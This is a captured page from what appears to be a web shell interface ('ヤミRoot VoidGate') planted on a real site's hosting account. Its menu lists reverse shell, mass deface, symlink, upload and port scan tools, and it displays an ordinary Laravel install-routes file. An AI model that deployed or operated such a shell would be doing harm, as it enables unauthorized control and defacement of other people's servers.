ヤミRoot VoidGate
User / IP
:
216.73.216.134
Host / Server
:
2.57.91.187 / jigishaelectronics.com
System
:
Linux us-bos-web1572.main-hosting.eu 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u852776893
/
domains
/
jigishaelectronics.com
/
public_html
/
routes
/
Viewing: install.php
<?php /* |-------------------------------------------------------------------------- | Install Routes |-------------------------------------------------------------------------- | | This route is responsible for handling the intallation process | | | */ use App\Http\Controllers\InstallController; Route::controller(InstallController::class)->group(function () { Route::get('/', 'step0'); Route::get('/step1', 'step1')->name('step1'); Route::get('/step2', 'step2')->name('step2'); Route::get('/step3/{error?}', 'step3')->name('step3'); Route::get('/step4', 'step4')->name('step4'); Route::get('/step5', 'step5')->name('step5'); Route::post('/database_installation', 'database_installation')->name('install.db'); Route::get('import_sql', 'import_sql')->name('import_sql'); Route::get('import_sql_with_demo', 'import_sql_with_demo')->name('import_sql_with_demo'); Route::post('system_settings', 'system_settings')->name('system_settings'); Route::post('purchase_code', 'purchase_code')->name('purchase.code'); });
Coded With 💗 by
0x6ick